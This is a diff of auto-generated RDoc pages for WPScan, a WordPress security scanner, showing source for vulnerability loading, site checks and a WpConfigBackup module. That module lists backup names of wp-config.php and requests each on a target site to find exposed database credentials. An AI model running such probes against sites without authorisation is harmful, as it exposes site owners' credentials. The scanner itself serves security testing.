</div><!-- available_updaters_classes-method -->
</div><!-- protected-class-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

311
doc/Vulnerable.html Normal file
View File

@@ -0,0 +1,311 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Vulnerable</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/vulnerable_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/vulnerable.rb">lib/wpscan/vulnerable.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-vulnerabilities">#vulnerabilities</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Vulnerable</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="vulns_file-attribute-method" class="method-detail">
<a name="vulns_file"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">vulns_file</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="vulns_xpath-attribute-method" class="method-detail">
<a name="vulns_xpath"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">vulns_xpath</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="vulnerabilities-method" class="method-detail ">
<a name="method-i-vulnerabilities"></a>
<div class="method-heading">
<span class="method-name">vulnerabilities</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>@return an array of <a href="WpVulnerability.html">WpVulnerability</a> (can
be empty)</p>
<div class="method-source-code" id="vulnerabilities-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/vulnerable.rb, line 24</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">vulnerabilities</span>
<span class="ruby-identifier">vulnerabilities</span> = []
<span class="ruby-identifier">xml</span> = <span class="ruby-constant">Nokogiri</span><span class="ruby-operator">::</span><span class="ruby-constant">XML</span>(<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-ivar">@vulns_file</span>)) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">config</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">config</span>.<span class="ruby-identifier">noblanks</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">xml</span>.<span class="ruby-identifier">xpath</span>(<span class="ruby-ivar">@vulns_xpath</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">node</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">vulnerabilities</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpVulnerability</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-identifier">node</span>.<span class="ruby-identifier">search</span>(<span class="ruby-string">&quot;title&quot;</span>).<span class="ruby-identifier">text</span>,
<span class="ruby-identifier">node</span>.<span class="ruby-identifier">search</span>(<span class="ruby-string">&quot;reference&quot;</span>).<span class="ruby-identifier">text</span>,
<span class="ruby-identifier">node</span>.<span class="ruby-identifier">search</span>(<span class="ruby-string">&quot;type&quot;</span>).<span class="ruby-identifier">text</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">vulnerabilities</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- vulnerabilities-source -->
</div>
</div><!-- vulnerabilities-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

386
doc/WebSite.html Normal file
View File

@@ -0,0 +1,386 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WebSite</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/web_site_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/web_site.rb">lib/wpscan/modules/web_site.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-is_online-3F">#is_online?</a></li>
<li><a href="#method-i-is_wordpress-3F">#is_wordpress?</a></li>
<li><a href="#method-i-redirection">#redirection</a></li>
<li><a href="#method-i-xmlrpc_url">#xmlrpc_url</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WebSite</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="is_online-3F-method" class="method-detail ">
<a name="method-i-is_online-3F"></a>
<div class="method-heading">
<span class="method-name">is_online?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Checks if the remote website is up.</p>
<div class="method-source-code" id="is_online-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/web_site.rb, line 52</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">is_online?</span>
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">code</span> <span class="ruby-operator">!=</span> <span class="ruby-value">0</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- is_online-3F-source -->
</div>
</div><!-- is_online-3F-method -->
<div id="is_wordpress-3F-method" class="method-detail ">
<a name="method-i-is_wordpress-3F"></a>
<div class="method-heading">
<span class="method-name">is_wordpress?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>check if the remote website is actually running wordpress.</p>
<div class="method-source-code" id="is_wordpress-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/web_site.rb, line 23</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">is_wordpress?</span>
<span class="ruby-identifier">wordpress</span> = <span class="ruby-keyword">false</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(
<span class="ruby-identifier">login_url</span>(),
{<span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>, <span class="ruby-value">:max_redirects</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">2</span>}
)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">%{WordPress}</span>
<span class="ruby-identifier">wordpress</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(
<span class="ruby-identifier">xmlrpc_url</span>(),
{<span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>, <span class="ruby-value">:max_redirects</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">2</span>}
)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">%{XML-RPC server accepts POST requests only}</span>
<span class="ruby-identifier">wordpress</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">wordpress</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- is_wordpress-3F-source -->
</div>
</div><!-- is_wordpress-3F-method -->
<div id="redirection-method" class="method-detail ">
<a name="method-i-redirection"></a>
<div class="method-heading">
<span class="method-name">redirection</span><span
class="method-args">(url = nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>see if the remote url returns 30x redirect return a string with the
redirection or nil</p>
<div class="method-source-code" id="redirection-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/web_site.rb, line 58</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">redirection</span>(<span class="ruby-identifier">url</span> = <span class="ruby-keyword">nil</span>)
<span class="ruby-identifier">redirection</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">url</span> <span class="ruby-operator">||=</span> <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">301</span> <span class="ruby-operator">||</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">302</span>
<span class="ruby-identifier">redirection</span> = <span class="ruby-identifier">response</span>.<span class="ruby-identifier">headers_hash</span>[<span class="ruby-string">'location'</span>]
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">redirection</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- redirection-source -->
</div>
</div><!-- redirection-method -->
<div id="xmlrpc_url-method" class="method-detail ">
<a name="method-i-xmlrpc_url"></a>
<div class="method-heading">
<span class="method-name">xmlrpc_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="xmlrpc_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/web_site.rb, line 47</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">xmlrpc_url</span>
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;xmlrpc.php&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- xmlrpc_url-source -->
</div>
</div><!-- xmlrpc_url-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

319
doc/WpConfigBackup.html Normal file
View File

@@ -0,0 +1,319 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WpConfigBackup</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/wp_config_backup_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/wp_config_backup.rb">lib/wpscan/modules/wp_config_backup.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-config_backup_files">::config_backup_files</a></li>
<li><a href="#method-i-config_backup">#config_backup</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WpConfigBackup</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="config_backup_files-method" class="method-detail ">
<a name="method-c-config_backup_files"></a>
<div class="method-heading">
<span class="method-name">config_backup_files</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>@return <a href="Array.html">Array</a></p>
<div class="method-source-code" id="config_backup_files-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_config_backup.rb, line 49</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">config_backup_files</span>
<span class="ruby-node">%{
wp-config.php~ #wp-config.php# wp-config.php.save wp-config.php.swp wp-config.php.swo wp-config.php_bak
wp-config.bak wp-config.php.bak wp-config.save wp-config.old wp-config.php.old wp-config.php.orig
wp-config.orig wp-config.php.original wp-config.original
}</span> <span class="ruby-comment"># thanks to Feross.org for these</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- config_backup_files-source -->
</div>
</div><!-- config_backup_files-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="config_backup-method" class="method-detail ">
<a name="method-i-config_backup"></a>
<div class="method-heading">
<span class="method-name">config_backup</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Checks to see if wp-config.php has a backup See <a
href="http://www.feross.org/cmsploit/">www.feross.org/cmsploit/</a> return
an array of backup config files url</p>
<div class="method-source-code" id="config_backup-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_config_backup.rb, line 24</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">config_backup</span>
<span class="ruby-identifier">found</span> = []
<span class="ruby-identifier">backups</span> = <span class="ruby-constant">WpConfigBackup</span>.<span class="ruby-identifier">config_backup_files</span>
<span class="ruby-identifier">browser</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>
<span class="ruby-identifier">hydra</span> = <span class="ruby-identifier">browser</span>.<span class="ruby-identifier">hydra</span>
<span class="ruby-identifier">backups</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">file</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">file_url</span> = <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-constant">URI</span>.<span class="ruby-identifier">escape</span>(<span class="ruby-identifier">file</span>)).<span class="ruby-identifier">to_s</span>
<span class="ruby-identifier">request</span> = <span class="ruby-identifier">browser</span>.<span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">file_url</span>)
<span class="ruby-identifier">request</span>.<span class="ruby-identifier">on_complete</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">response</span><span class="ruby-operator">|</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{define}</span>] <span class="ruby-keyword">and</span> <span class="ruby-keyword">not</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{&lt;\s?html}</span>]
<span class="ruby-identifier">found</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">file_url</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">hydra</span>.<span class="ruby-identifier">queue</span>(<span class="ruby-identifier">request</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-identifier">found</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- config_backup-source -->
</div>
</div><!-- config_backup-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

341
doc/WpDetector.html Normal file
View File

@@ -0,0 +1,341 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpDetector</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_detector_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_detector.rb">lib/wpscan/wp_detector.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-aggressive_detection">::aggressive_detection</a></li>
<li><a href="#method-c-passive_detection">::passive_detection</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
